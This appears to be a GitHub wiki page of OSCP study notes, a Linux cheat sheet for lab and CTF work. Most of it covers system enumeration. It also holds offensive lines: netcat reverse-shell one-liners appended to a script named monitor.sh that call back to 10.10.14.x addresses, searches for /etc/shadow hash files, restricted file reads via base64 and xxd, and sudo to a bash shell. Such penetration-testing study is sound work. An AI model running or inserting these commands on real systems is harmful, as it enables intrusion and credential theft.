Linux - A1vinSmith/OSCP-PWK GitHub Wiki

Check Kernel Version

https://phoenixnap.com/kb/check-linux-kernel-version

uname -a
hostnamectl
cat /proc/version
cat /etc/issue
dmesg | grep Linux

Check architecture

lscpu

Check Release

/etc/lsb-release
/etc/update-manager/meta-release
/etc/os-release

Find ip among files

grep -rn '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

Find flag in MOTD

cd /etc/update-motd.d
grep -irn 'flag'

Find users

cat /etc/passwd | grep /bin/bash

cat /etc/passwd | cut -d : -f 1

Find files

find / -type f -name *.conf -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null

find / -user jimmy 2>/dev/null

Find users hash

/etc/shadow find / -name '*shadow*' -exec ls -lt {} \; 2>/dev/null /var/shadow.bak

File Read

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

LFILE=file_to_read
base64 "$LFILE" | base64 --decode
xxd "$LFILE" | xxd -r

List all progress/service

ps -aux ps aux

ps aux | grep root

Switch to another user

su -l user

Run as another user

sudo -u user2 /bin/bash -p

Sed

https://www.howtogeek.com/666395/how-to-use-the-sed-command-on-linux/

Find

1. find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null

• -type f only looking for regular files

• -print0 prints the full file name

• 2>/dev/null discards the output instead of printing it to a file

• xargs -0 discards spaces, quotes and backslashes

• regex here matching 32 characters containing the characters a-z and 0-9

Make a reverse shell

• https://metahackers.pro/reverse-shells-101/
• https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner

Tr

https://www.computerhope.com/unix/utr.htm

cat file | tr -d ' ' remove all the spaces within the file

Cat

• https://linuxhandbook.com/view-file-linux/
• rev file | rev

Tee

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4567 >/tmp/f' | tee -a monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f' >> monitor.sh

File Signatures

• https://www.garykessler.net/library/file_sigs.html
• https://en.wikipedia.org/wiki/List_of_file_signatures

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

netstat -tunleep4 | grep -v "127.0.0" | awk '{print $6}' | grep LISTEN | wc -l

Capture ping

sudo tcpdump -i tun0 icmp https://www.ibm.com/support/pages/using-tcpdump-verify-icmp-polling

Disk

df -lh
mount